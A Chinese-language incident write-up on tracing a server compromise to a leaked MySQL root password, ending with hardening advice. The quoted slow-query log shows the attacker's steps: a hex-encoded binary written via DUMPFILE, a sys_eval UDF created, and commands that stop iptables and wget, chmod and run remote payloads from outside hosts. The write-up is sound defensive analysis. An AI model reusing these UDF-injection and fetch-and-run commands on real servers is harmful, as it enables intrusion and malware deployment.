#### 现象
- 有很多命名奇怪的进程(现场图没有保留,这个是自己模拟的):
##### 定位步骤一:查看进程文件位置
通过命令
```
ll /proc/pid
```
查看进程文件exe执行路径,打开后整个人都惊呆了!mysql目录和mysql/data目录多了很多奇怪的so文件和可执行文件:
##### 定位步骤二:立马kill掉进程和文件
- 批量kill进程:介绍一个在[stackoverflow](http://stackoverflow.com/questions/3510673/find-and-kill-a-process-in-one-line-using-bash-and-regex/3510850#3510850)看到的人性化易懂的批量kill进程的方法:
```
kill `ps -ef | grep [s]leep | awk '{print $2}'`
解释:
- [s]正则是为了防止匹配到ps本身,免去了grep -V
- awk '{print $2}' 只输出第二列的进程号
- ``是执行命令返回结果,shell语法
- kill grep出来的所有匹配的进程号
```
##### 定位步骤三:修改root密码&关闭ftp匿名用户
正常攻击也没有办法上传木马文件,初步怀疑是服务器密码泄露,被登录进来,然后上传了木马病毒脚本文件,于是通过阿里云控制台修改了root密码,并且重启了机器。
或者另一种可能是通过ftp上传的。此外又看了ftp匿名用户打开了
##### 定位步骤四:再次受到攻击!!!
原本以为修改了root密码并重启了服务器问题已经解决,但是过了一两天阿里云又提示有告警,每隔几天就爆出问题,实在是想不到原因,最后发现个现象木马进程都是mysql用户启动的,mysql攻击也不能自己启动进程,就算存在sql注入也没有理由能上下载文件吧。
##### 定位步骤五:捕捉现场-把mysql全日志打开
既然问题是出在mysql,把mysql的所有查询日志,把slow_log的时间改成0:
```
mysql -help | grep cnf
vi /etc/my.cnf
long_query_time= 0
slow_query_log=ON
slow_query_log_file=/alidata/log/mysql/slow.log
```
##### 定位步骤五:分析日志&入侵过程
观察了一断时间,看slow.log一切豁然开朗了:
有很多奇怪的操作,包括DUMPFILE导出日志
```
//创建表
create table if not exists tempMix4(data LONGBLOB);
// 第一步设置变量
set @a = concat('',0x4D5A4B45524E454C33322E444C4C00004C6F61644C696272617279410000000047657450726F63416464726573730000557061636B42794477696E6740000000504500004C010200001000000800000000000000E0000E210B0100390050000000600000000000008D09010000100000006000000000001000100000000200000400000000000000040000000000000000800100000200000000000002000000000010000010000000001000001000000000000010000000590C0100B8000000410C01001400000000D000009003000000000000000000000000000000000000480000000800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002E557061636B000000C00000001000000000000000000000000000000000000000000000600000E02E7273726300000000B0000000D00000113D000000020000000000000000000000000000600000E088010010140D01101B0000000E00000000100010BB0B0110070C01100A0C0110180C0110F30B0110FC0F00102E0B0110300B0110D009011065C600103D0C0110FFBF0010220B0110000400007C070000C40B0000400100009F02000090D3001000000000FFFFFFFF0100000001000000010000000100000000000000000000000000000000000100100000001800008000000000000000000000000000000100010000003000008000000000000000000000000000000100000000004800000058D00000380300000000000000000000380334000000560053005F00560045005200530049004F004E005F0049004E0046004F0000003400BD04EFFE00000100060002001D235600060002001D2356003F00000000000000040000000100000000000000000000000000000098020000000053007400720069006E006700460069006C00650049006E0066006F00000074020000000030003000300030003000340045003400000040002800010043006F006D006D0065006E0074007300000032003000300039002D00310032002D00310030002000310036003A00350031003A003100390000003C001C00010043006F006D00700061006E0079004E0061006D0065000000000050005000530074007200650061006D00200049006E0063002E000000500026000100460069006C0065004400650073006300720069007000740069006F006E000000000050005000530074007200650061006D00200049006E007300740061006C006C006500720000000000380018000100460069006C006500560065007200730069006F006E000000000032002E0036002E00380036002E00380039003800390000009C00760001004C006500670061006C0043006F007000790072006900670068007400000043006F0070007900720069006700680074002000280043002900200032003000300035002D0032003000300039002000500050005300740072006
//第二步 插入到临时表
INSERT INTO tempMix VALUES (@a);
// 导入函数
# User@Host: root[root] @ [115.28.238.77] Id: 3
# Query_time: 0.001387 Lock_time: 0.000947 Rows_sent: 0 Rows_examined: 0
SET timestamp=1471084691;
CREATE FUNCTION sys_eval RETURNS string SONAME 'sys.so';
# User@Host: root[root] @ [115.28.238.77] Id: 3
# Query_time: 0.000213 Lock_time: 0.000113 Rows_sent: 0 Rows_examined: 0
SET timestamp=1471084691;
select sys_eval("wget http://www.zuimihu.cn/DDos;chmod 777 DDos;./DDos;");
# Time: 160831 3:51:28
# User@Host: root[root] @ [121.42.195.49] Id: 115
# Query_time: 2.444778 Lock_time: 0.000000 Rows_sent: 1 Rows_examined: 0
SET timestamp=1472586688;
select sys_eval("/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://211.127.220.60:809/TSmmm;chmod 777 TSmmm;./TSmmm;");
```
##### 定位步骤六:入侵原因分析
通过代码层面入侵的可能性非常低,唯一的可能性是mysql的root账号密码被泄露或者被破解导致的,且从slow-log看访问ip就不是本机,可以推断出是远程登录上mysql然后进行攻击。
##### 定位步骤七:防范措施
核心账号密码一定要足够的复杂,保密,定期更换,最好限制IP登录,只允许本机登录,再开放其他低权限的账户。
修改密码和权限后一周内也没有出现过问题。
#### 相关学习
- [MySQL慢日志查询全解析:从参数、配置到分析工具](http://mp.weixin.qq.com/s?__biz=MzI4NTA1MDEwNg==&mid=2650756876&idx=1&sn=d6c91752f05cfa0a3c55b4b3b433733a&chksm=f3f9e299c48e6b8f12f91018ce14a0e15acbffe8ce09f4c62a82661acd29abdce94723c13fc0&mpshare=1&scene=1&srcid=0929TCKiJ86ZAlthrUPVOs4s#rd)
